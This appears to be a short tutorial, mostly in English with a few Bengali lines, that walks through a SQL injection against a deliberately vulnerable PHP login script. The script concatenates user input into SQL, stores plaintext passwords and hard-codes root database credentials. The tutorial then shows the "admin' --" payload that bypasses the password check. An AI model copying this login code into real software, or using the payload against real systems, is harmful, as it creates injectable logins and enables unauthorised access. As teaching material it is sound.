Scenario Setup
User Table:
CREATE TABLE users (
id INT PRIMARY KEY AUTO_INCREMENT,
username VARCHAR(255) UNIQUE NOT NULL,
password VARCHAR(255) NOT NULL
);
Login Form:
<form action="login.php" method="POST">
<input type="text" name="username" placeholder="Username">
<input type="password" name="password" placeholder="Password">
<button type="submit">Login</button>
</form>
Login Script (login.php):
<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
$username = $_POST['username'];
$password = $_POST['password'];
// Connect to database
$conn = new mysqli('localhost', 'root', 'password', 'database');
if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
}
// Query to check the user credentials
$sql = "SELECT * FROM users WHERE username='$username' AND password='$password'";
$result = $conn->query($sql);
if ($result->num_rows > 0) {
echo "Login successful!";
} else {
echo "Invalid credentials.";
}
$conn->close();
}
?>
Step-by-Step Breakdown of SQL Injection
- Understanding the Vulnerable Query:
$sql = "SELECT * FROM users WHERE username='$username' AND password='$password'";This query is vulnerable because user input is directly included in the SQL query without any sanitization or parameterization.
Initial Input Values:
- এবার আমরা কোয়েরি তে ডেটা দিয়ে চেষ্টা করি।
username:adminpassword:password
- The resulting query would be:
SELECT * FROM users WHERE username='admin' AND password='password';
Injecting SQL Code:
- To exploit the vulnerability, an attacker can manipulate the input values. For example:
username:admin' --password:anything
- The resulting query becomes:
SELECT * FROM users WHERE username='admin' --' AND password='anything';The -- sequence is an SQL comment delimiter. Everything after -- is ignored by the SQL engine, effectively turning the query into:
SELECT * FROM users WHERE username='admin';This query will bypass the password check, allowing the attacker to log in as the user admin.
আমরা এখানে যে কোড টি ব্যবহার করলাম এগুলোকে বলে payloads .